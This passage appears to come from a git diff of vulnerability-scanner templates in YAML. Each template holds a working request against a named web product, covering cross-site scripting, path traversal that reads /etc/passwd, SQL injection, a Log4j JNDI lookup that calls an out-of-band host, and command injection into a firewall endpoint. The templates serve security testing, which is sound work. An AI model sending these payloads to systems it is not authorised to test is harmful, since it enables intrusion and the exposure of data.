+info:
+  name: Online Farm Management System 0.1.0 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    Online Farm Management System is affected by Cross-Site Scripting on the review.php file.
+  reference:
+    - https://www.exploit-db.com/exploits/48673
+  metadata:
+    verified: true
+  tags: onlinefarm,cms,xss,edb
+
+requests:
+  - raw:
+      - |
+        POST /reviewInput.php?pid=1 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        comment=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&rating=0
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<em style="color: black;"><script>alert(document.domain)</script>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/other/opencti-lfi.yaml b/vulnerabilities/other/opencti-lfi.yaml
new file mode 100644
index 0000000000..966b929a25
--- /dev/null
+++ b/vulnerabilities/other/opencti-lfi.yaml
@@ -0,0 +1,36 @@
+id: opencti-lfi
+
+info:
+  name: OpenCTI 3.3.1 - Local File Inclusion
+  author: 0x_Akoko
+  severity: high
+  description: OpenCTI 3.3.1 is vulnerable to local file inclusion.
+  reference:
+    - https://cxsecurity.com/issue/WLB-2020060078
+    - https://github.com/OpenCTI-Platform/opencti/releases/tag/3.3.1
+  metadata:
+    verified: true
+    shodan-query: http.html:"OpenCTI"
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: opencti,lfi,oss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/static/css//../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/04
diff --git a/vulnerabilities/other/opennms-log4j-jndi-rce.yaml b/vulnerabilities/other/opennms-log4j-jndi-rce.yaml
new file mode 100644
index 0000000000..1a5fa028db
--- /dev/null
+++ b/vulnerabilities/other/opennms-log4j-jndi-rce.yaml
@@ -0,0 +1,55 @@
+id: opennms-log4j-jndi-rce
+
+info:
+  name: OpenNMS - Log4j JNDI RCE
+  author: johnk3r
+  severity: critical
+  description: |
+    OpenNMS Apache Log4j2 <=2.14.1 JNDI in features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker
+    who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
+  reference:
+    - https://www.horizon3.ai/the-long-tail-of-log4shell-exploitation/
+    - https://www.opennms.com/en/blog/2021-12-10-opennms-products-affected-by-apache-log4j-vulnerability-cve-2021-44228/
+    - https://logging.apache.org/log4j/2.x/security.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10
+    cve-id: CVE-2021-44228
+    cwe-id: CWE-917
+  metadata:
+    shodan-query: title:"OpenNMS Web Console"
+    verified: "true"
+  tags: jndi,log4j,rce,opennms,cve,cve2021,kev
+
+requests:
+  - raw:
+      - |
+        POST /opennms/j_spring_security_check HTTP/1.1
+        Referer: {{RootURL}}/opennms/login.jsp
+        Content-Type: application/x-www-form-urlencoded
+
+        j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&Login=&j_usergroups=
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: regex
+        part: interactsh_request
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Match for extracted ${hostName} variable
+
+    extractors:
+      - type: kval
+        kval:
+          - interactsh_ip # Print remote interaction IP in output
+
+      - type: regex
+        part: interactsh_request
+        group: 1
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${hostName} in output
diff --git a/vulnerabilities/other/opensis-lfi.yaml b/vulnerabilities/other/opensis-lfi.yaml
index 8037b9afd6..528059b020 100644
--- a/vulnerabilities/other/opensis-lfi.yaml
+++ b/vulnerabilities/other/opensis-lfi.yaml
@@ -1,14 +1,19 @@
 id: opensis-lfi
 
 info:
-  name: openSIS 5.1 - 'ajax.php' Local File Inclusion
+  name: openSIS 5.1 - Local File Inclusion
   author: pikpikcu
   severity: high
-  description: An attacker can exploit a vulnerability in openSIS to obtain potentially sensitive information and execute arbitrary local scripts in the context of the Web server process. This may allow the attacker
-    to compromise the application and computer; other attacks are also possible.
+  description: openSIS 5.1 is vulnerable to local file inclusion and allows attackers to obtain potentially sensitive information by executing arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and computer; other attacks are also possible.
   reference:
     - https://www.exploit-db.com/exploits/38039
-  tags: opensis,lfi
+  metadata:
+    shodan-query: http.title:"openSIS"
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: opensis,lfi,edb
 
 requests:
   - method: GET
@@ -26,3 +31,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/04
diff --git a/vulnerabilities/other/opensns-rce.yaml b/vulnerabilities/other/opensns-rce.yaml
index 8935365a70..241dd31a47 100644
--- a/vulnerabilities/other/opensns-rce.yaml
+++ b/vulnerabilities/other/opensns-rce.yaml
@@ -1,13 +1,15 @@
 id: opensns-rce
 
 info:
-  name: OpenSNS Remote Code Execution Vulnerability
+  name: OpenSNS - Remote Code Execution
   author: gy741
   severity: critical
-  description: A vulnerability in OpenSNS allows remote unauthenticated attackers to cause the product to execute arbitrary code via the 'shareBox' endpoint.
-  reference:
-    - http://www.0dayhack.net/index.php/2417/
-    - https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
+  description: |
+    OpenSNS allows remote unauthenticated attackers to execute arbitrary code via the 'shareBox' endpoint.
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: opensns,rce
 
 requests:
@@ -19,10 +21,10 @@ requests:
     matchers-condition: and
     matchers:
       - type: regex
+        part: body
         regex:
           - "((u|g)id=)"
           - "Microsoft Windows"
-        part: body
         condition: or
 
       - type: word
@@ -32,3 +34,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/30
diff --git a/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml b/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml
index a1a850487d..5e30e7db5c 100644
--- a/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml
+++ b/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml
@@ -12,7 +12,7 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 10.0
     cwe-id: CWE-77
-  tags: optiLink,rce,oast,mirai
+  tags: optiLink,rce,oast,mirai,packetstorm
 
 requests:
   - raw:
diff --git a/vulnerabilities/other/oracle-fatwire-lfi.yaml b/vulnerabilities/other/oracle-fatwire-lfi.yaml
index 6858a74129..d48996de9d 100644
--- a/vulnerabilities/other/oracle-fatwire-lfi.yaml
+++ b/vulnerabilities/other/oracle-fatwire-lfi.yaml
@@ -3,11 +3,16 @@ id: oracle-fatwire-lfi
 info:
   name: Oracle Fatwire 6.3 - Path Traversal
   author: Bernardo Rodrigues @bernardofsr
-  severity: critical
-  description: Oracle Fatwire 6.3 suffers from a path traversal vulnerability in the getSurvey.jsp endpoint
+  severity: high
+  description: |
+    Oracle Fatwire 6.3 suffers from a path traversal vulnerability in the getSurvey.jsp endpoint.
   reference:
     - https://www.exploit-db.com/exploits/50167
-  tags: lfi,oracle,fatwire
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
+    cwe-id: CWE-22
+  tags: lfi,oracle,fatwire,edb
 
 requests:
   - method: GET
@@ -24,3 +29,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/30
diff --git a/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml b/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml
new file mode 100644
index 0000000000..a42f1563c0
--- /dev/null
+++ b/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml
@@ -0,0 +1,33 @@
+id: orbiteam-bscw-server-lfi
+
+info:
+  name: OrbiTeam BSCW Server - Local File Inclusion
+  author: 0x_Akoko
+  severity: high
+  description: |
+    OrbiTeam BSCW Server versions 5.0.x, 5.1.x, 5.2.4 and below, 7.3.x and below, and 7.4.3 and below are vulnerable to unauthenticated local file inclusion.
+  reference:
+    - https://packetstormsecurity.com/files/165156/OrbiTeam-BSCW-Server-XSS-LFI-User-Enumeration.html
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: bscw,orbiteam,lfi,unauth,packetstorm
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/pub/bscw.cgi/30?op=theme&style_name=../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/04
diff --git a/vulnerabilities/other/otobo-open-redirect.yaml b/vulnerabilities/other/otobo-open-redirect.yaml
index f18da7474c..905cf5afd8 100644
--- a/vulnerabilities/other/otobo-open-redirect.yaml
+++ b/vulnerabilities/other/otobo-open-redirect.yaml
@@ -8,15 +8,15 @@ info:
   reference:
     - https://huntr.dev/bounties/de64ac71-9d06-47cb-b643-891db02f2a1f/
     - https://github.com/rotheross/otobo
-  tags: redirect,otobo
+  tags: redirect,otobo,huntr
 
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/otobo/index.pl?Action=ExternalURLJump;URL=http://www.example.com'
+      - '{{BaseURL}}/otobo/index.pl?Action=ExternalURLJump;URL=http://www.interact.sh'
 
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/vulnerabilities/other/pacsone-server-lfi.yaml b/vulnerabilities/other/pacsone-server-lfi.yaml
index 9ad5ecf688..9183daf5cd 100644
--- a/vulnerabilities/other/pacsone-server-lfi.yaml
+++ b/vulnerabilities/other/pacsone-server-lfi.yaml
@@ -1,11 +1,16 @@
 id: pacsone-server-lfi
 
 info:
-  name: PACSOne Server 6.6.2 DICOM Web Viewer Directory Trasversal
+  name: PACSOne Server 6.6.2 - Local File Inclusion
   author: 0x_Akoko
   severity: high
+  description: PACSOne Server 6.6.2 is vulnerable to local file inclusion via its integrated DICOM Web Viewer.
   reference:
     - https://cxsecurity.com/issue/WLB-2018010303
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: pacsone,lfi
 
 requests:
@@ -22,3 +27,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/04
diff --git a/vulnerabilities/other/parallels-hsphere-xss.yaml b/vulnerabilities/other/parallels-hsphere-xss.yaml
new file mode 100644
index 0000000000..3aac9cc6fd
--- /dev/null
+++ b/vulnerabilities/other/parallels-hsphere-xss.yaml
@@ -0,0 +1,37 @@
+id: parallels-hsphere-xss
+
+info:
+  name: Parallels H-Sphere - Cross-Site Scripting
+  author: ritikchaddha
+  severity: medium
+  description: |
+    H-Sphere is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+  reference:
+    - https://www.exploit-db.com/exploits/32396
+  metadata:
+    verified: true
+    shodan-query: title:"h-sphere"
+  tags: hsphere,xss,edb,parallels
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/webshell4/login.php?err=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/webshell4/login.php?login=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - 'value="\"><script>alert(document.domain)</script>'
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/other/parentlink-xss.yaml b/vulnerabilities/other/parentlink-xss.yaml
index 9b9766f693..378cf228c6 100644
--- a/vulnerabilities/other/parentlink-xss.yaml
+++ b/vulnerabilities/other/parentlink-xss.yaml
@@ -1,7 +1,7 @@
 id: parentlink-xss
 
 info:
-  name: Blackboard ParentLink Reflected XSS
+  name: Blackboard ParentLink Cross-Site Scripting
   author: r3naissance
   severity: medium
   reference:
diff --git a/vulnerabilities/other/php-timeclock-xss.yaml b/vulnerabilities/other/php-timeclock-xss.yaml
index 4da922addd..2482f4030a 100644
--- a/vulnerabilities/other/php-timeclock-xss.yaml
+++ b/vulnerabilities/other/php-timeclock-xss.yaml
@@ -1,13 +1,13 @@
 id: php-timeclock-xss
 
 info:
-  name: PHP Timeclock 1.04 XSS
+  name: PHP Timeclock 1.04 Cross-Site Scripting
   author: pikpikcu
   severity: medium
   description: PHP Timeclock version 1.04 (and prior) Cross-Site Scripting vulnerabilities
   reference:
     - https://www.exploit-db.com/exploits/49853
-  tags: xss,php,timeclock
+  tags: xss,php,timeclock,edb
 
 requests:
   - method: GET
diff --git a/vulnerabilities/other/php-zerodium-backdoor-rce.yaml b/vulnerabilities/other/php-zerodium-backdoor-rce.yaml
index 180d517472..dfadc93430 100644
--- a/vulnerabilities/other/php-zerodium-backdoor-rce.yaml
+++ b/vulnerabilities/other/php-zerodium-backdoor-rce.yaml
@@ -1,13 +1,19 @@
 id: php-zerodium-backdoor-rce
 
 info:
-  name: PHP Zerodium Backdoor RCE
+  name: PHP 8.1.0-dev - Backdoor Remote Code Execution
   author: dhiyaneshDk
   severity: critical
-  description: A backdoor has been introduced into PHP, dubbed 'zerodiumvar_dump', the backdoor allowed the execution of arbitrary PHP code.
+  description: |
+    PHP 8.1.0-dev contains a backdoor dubbed 'zerodiumvar_dump' which can allow the execution of arbitrary PHP code.
   reference:
     - https://news-web.php.net/php.internals/113838
-  tags: php,backdoor
+    - https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  tags: php,backdoor,rce,zerodium
 
 requests:
   - method: GET
@@ -21,6 +27,8 @@ requests:
     matchers:
 
       - type: word
+        part: body
         words:
           - "int(54289)"
-        part: body
+
+# Enhanced by mp on 2022/05/30
diff --git a/vulnerabilities/other/phpok-sqli.yaml b/vulnerabilities/other/phpok-sqli.yaml
new file mode 100644
index 0000000000..28658f800e
--- /dev/null
+++ b/vulnerabilities/other/phpok-sqli.yaml
@@ -0,0 +1,25 @@
+id: phpok-sqli
+
+info:
+  name: PHPOK - Sql Injection
+  author: ritikchaddha
+  severity: high
+  metadata:
+    verified: true
+    fofa-query: app="phpok"
+  tags: phpok,sqli
+
+variables:
+  num: "999999999"
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{num}}))) --+'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5({{num}})}}'
diff --git a/vulnerabilities/other/phpwiki-lfi.yaml b/vulnerabilities/other/phpwiki-lfi.yaml
index dda2c1fdb7..3e86d81da6 100644
--- a/vulnerabilities/other/phpwiki-lfi.yaml
+++ b/vulnerabilities/other/phpwiki-lfi.yaml
@@ -1,13 +1,13 @@
 id: phpwiki-lfi
 
 info:
-  name: phpwiki 1.5.4 - XSS / Local File Inclusion
+  name: phpwiki 1.5.4 - Cross-Site Scripting/Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: A vulnerability in phpwiki allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint.
+  description: phpwiki 1.5.4 is vulnerable to cross-site scripting and local file inclusion, and allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint.
   reference:
     - https://www.exploit-db.com/exploits/38027
-  tags: phpwiki,lfi,xss
+  tags: xss,edb,phpwiki,lfi
 
 requests:
   - method: GET
@@ -24,3 +24,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/04
diff --git a/vulnerabilities/other/pmb-directory-traversal.yaml b/vulnerabilities/other/pmb-directory-traversal.yaml
index 69934ef8a1..ef410b4187 100644
--- a/vulnerabilities/other/pmb-directory-traversal.yaml
+++ b/vulnerabilities/other/pmb-directory-traversal.yaml
@@ -1,13 +1,17 @@
 id: pmb-directory-traversal
 
 info:
-  name: PMB 5.6 - Arbitrary File Retrieval
+  name: PMB 5.6 - Local File Inclusion
   author: geeknik
-  severity: medium
-  description: The PMB Gif Image is not sanitizing the content of the 'chemin' parameter, wchi can be used for local file retrieval.
+  severity: high
+  description: PMB 5.6 is vulnerable to local file inclusion because the PMB Gif Image is not sanitizing the content of the 'chemin' parameter.
   reference:
     - https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html
-  tags: lfi
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: lfi,packetstorm
 
 requests:
   - method: GET
@@ -25,3 +29,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/04
diff --git a/vulnerabilities/other/pmb-local-file-disclosure.yaml b/vulnerabilities/other/pmb-local-file-disclosure.yaml
index b67c0f99da..1bdcdb5cfb 100644
--- a/vulnerabilities/other/pmb-local-file-disclosure.yaml
+++ b/vulnerabilities/other/pmb-local-file-disclosure.yaml
@@ -1,12 +1,17 @@
 id: pmb-local-file-disclosure
 
 info:
-  name: PMB 5.6 - getgif.php Arbitrary File Retrieval
+  name: PMB 5.6 - Local File Inclusion
   author: dhiyaneshDk
+  description: PMB 5.6 is vulnerable to local file inclusion.
   severity: high
   reference:
     - https://www.exploit-db.com/exploits/49054
-  tags: lfi,pmb
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: lfi,pmb,edb
 
 requests:
   - method: GET
@@ -21,3 +26,5 @@ requests:
       - type: word
         words:
           - "root:x:0"
+
+# Enhanced by mp on 2022/08/04
diff --git a/vulnerabilities/other/pollbot-redirect.yaml b/vulnerabilities/other/pollbot-redirect.yaml
index c11e6df5d3..251cdd6ee3 100644
--- a/vulnerabilities/other/pollbot-redirect.yaml
+++ b/vulnerabilities/other/pollbot-redirect.yaml
@@ -13,14 +13,14 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/%0A/example.com/'
+      - '{{BaseURL}}/%0A/interact.sh/'
 
     matchers-condition: and
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
 
       - type: status
         status:
diff --git a/vulnerabilities/other/powercreator-cms-rce.yaml b/vulnerabilities/other/powercreator-cms-rce.yaml
index 3d96d4b8fe..bd613597a4 100644
--- a/vulnerabilities/other/powercreator-cms-rce.yaml
+++ b/vulnerabilities/other/powercreator-cms-rce.yaml
@@ -1,12 +1,18 @@
 id: powercreator-cms-rce
 
 info:
-  name: PowerCreator CMS RCE
+  name: PowerCreator CMS - Remote Code Execution
   author: pikpikcu
   severity: critical
+  description: |
+    PowerCreator CMS is susceptible to a remote code execution vulnerability.
   reference:
     - https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/PowerCreatorCms/PowerCreatorCms%E4%BB%BB%E6%84%8F%E4%B8%8A%E4%BC%A0/
-  tags: rce,powercreator
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  tags: rce,powercreator,intrusive,fileupload
 
 requests:
   - raw:
@@ -39,4 +45,6 @@ requests:
     matchers:
       - type: dsl
         dsl:
-          - "contains(body_2, '{{randstr}}') && status_code_2 == 200"
\ No newline at end of file
+          - "contains(body_2, '{{randstr}}') && status_code_2 == 200"
+
+# Enhanced by mp on 2022/05/30
diff --git a/vulnerabilities/other/processmaker-lfi.yaml b/vulnerabilities/other/processmaker-lfi.yaml
index 5645ae5556..a240eb81c2 100644
--- a/vulnerabilities/other/processmaker-lfi.yaml
+++ b/vulnerabilities/other/processmaker-lfi.yaml
@@ -1,14 +1,18 @@
 id: processmaker-lfi
 
 info:
-  name: ProcessMaker <= 3.5.4 Directory Traversal
+  name: ProcessMaker <=3.5.4 - Local File Inclusion
   author: KrE80r
   severity: high
-  description: A vulnerability in ProcessMaker allows remote attackers to access arbitrary files and disclose their content.
+  description: ProcessMaker 3.5.4 and prior is vulnerable to local file inclusion.
   reference:
     - https://www.exploit-db.com/exploits/50229
     - https://www.processmaker.com
-  tags: processmaker,lfi
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: processmaker,lfi,edb
 
 requests:
   - raw:
@@ -26,3 +30,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/04
diff --git a/vulnerabilities/other/qcubed-xss.yaml b/vulnerabilities/other/qcubed-xss.yaml
index 288d0ba81d..5546f1ccce 100644
--- a/vulnerabilities/other/qcubed-xss.yaml
+++ b/vulnerabilities/other/qcubed-xss.yaml
@@ -1,7 +1,7 @@
 id: qcubed-xss
 
 info:
-  name: Qcubed Reflected XSS
+  name: Qcubed Cross-Site Scripting
   author: pikpikcu
   severity: medium
   description: A vulnerability in Qcubed allows remote attackers to inject arbitrary Javascript via the '/assets/php/_devtools/installer/step_2.php' endpoint and the 'installation_path' parameter.
diff --git a/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml b/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml
index 0dc5ff5f59..4ee8e90d78 100644
--- a/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml
+++ b/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml
@@ -1,12 +1,18 @@
 id: qi-anxin-netkang-next-generation-firewall-rce
 
 info:
-  name: Qi'anxin Netkang Next Generation Firewall RCE
+  name: Qi'anxin Netkang Next Generation Firewall - Remote Code Execution
   author: pikpikcu
   severity: critical
+  description: |
+    Qi'anxin Netkang Next Generation Firewall is susceptible to remote code execution.
   reference:
     - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
-  tags: rce
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  tags: rce,firewall,intrusive
 
 requests:
   - raw:
@@ -14,19 +20,21 @@ requests:
         POST /directdata/direct/router HTTP/1.1
         Host: {{Hostname}}
 
-        {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/poc.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
+        {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;touch /var/www/html/{{randstr}}.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
 
       - |
-        GET /poc.txt HTTP/1.1
+        GET /{{randstr}}.txt HTTP/1.1
         Host: {{Hostname}}
 
     matchers-condition: and
     matchers:
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
-        part: body
 
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/30
diff --git a/vulnerabilities/other/qihang-media-disclosure.yaml b/vulnerabilities/other/qihang-media-disclosure.yaml
index aef7fffd30..eb7562b469 100644
--- a/vulnerabilities/other/qihang-media-disclosure.yaml
+++ b/vulnerabilities/other/qihang-media-disclosure.yaml
@@ -1,13 +1,17 @@
 id: qihang-media-disclosure
 
 info:
-  name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 - Cleartext Credentials Disclosure
+  name: QiHang Media Web Digital Signage 3.0.9 - Cleartext Credentials Disclosure
   author: gy741
-  severity: critical
-  description: The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml
-    and obtain administrative login information that allows for a successful authentication bypass attack.
+  severity: high
+  description: |
+    QiHang Media Web Digital Signage 3.0.9 suffers from a clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack.
   reference:
     - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cwe-id: CWE-522
   tags: qihang,exposure
 
 requests:
@@ -17,9 +21,12 @@ requests:
 
     matchers:
       - type: word
+        part: body
         words:
           - "<?xml version"
           - "<Users>"
           - "account="
           - "password="
         condition: and
+
+# Enhanced by mp on 2022/05/30
diff --git a/vulnerabilities/other/qihang-media-lfi.yaml b/vulnerabilities/other/qihang-media-lfi.yaml
index ea6db6c683..035e702293 100644
--- a/vulnerabilities/other/qihang-media-lfi.yaml
+++ b/vulnerabilities/other/qihang-media-lfi.yaml
@@ -24,14 +24,14 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: header
         words:
           - "filename=QH.aspx"
           - "application/zip"
-        part: header
         condition: and
 
       - type: word
-        regex:
+        words:
           - "QH.aspx.cs"
           - "QiHang.Media.Web.QH"
         condition: and
diff --git a/vulnerabilities/other/rconfig-rce.yaml b/vulnerabilities/other/rconfig-rce.yaml
index a4611b31a5..4ae976a766 100644
--- a/vulnerabilities/other/rconfig-rce.yaml
+++ b/vulnerabilities/other/rconfig-rce.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://www.rconfig.com/downloads/rconfig-3.9.5.zip
     - https://www.exploit-db.com/exploits/48878
-  tags: rconfig,rce
+  tags: rconfig,rce,edb
 
 requests:
   - raw:
diff --git a/vulnerabilities/other/reddittop-rss-xss.yaml b/vulnerabilities/other/reddittop-rss-xss.yaml
new file mode 100644
index 0000000000..52f5716905
--- /dev/null
+++ b/vulnerabilities/other/reddittop-rss-xss.yaml
@@ -0,0 +1,34 @@
+id: reddittop-rss-xss
+
+info:
+  name: Reddit Top RSS - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    Reddit Top RSS allows Reflected Cross Site Scripting via /?subreddit=news&score= parameter.
+  reference:
+    - https://github.com/johnwarne/reddit-top-rss/issues/12
+  metadata:
+    verified: true
+  tags: reddit,rss,xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/?subreddit=news&score=2134%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'value="2134"><script>alert(document.domain)</script>" min="0"'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/other/rockmongo-xss.yaml b/vulnerabilities/other/rockmongo-xss.yaml
index a44e456d52..642312426f 100644
--- a/vulnerabilities/other/rockmongo-xss.yaml
+++ b/vulnerabilities/other/rockmongo-xss.yaml
@@ -1,13 +1,13 @@
 id: rockmongo-xss
 
 info:
-  name: RockMongo V1.1.8 XSS
+  name: RockMongo V1.1.8 Cross-Site Scripting
   author: pikpikcu
   severity: medium
   description: A vulnerability in RockMongo allows attackers to inject arbitrary javascript into the response returned by the application.
   reference:
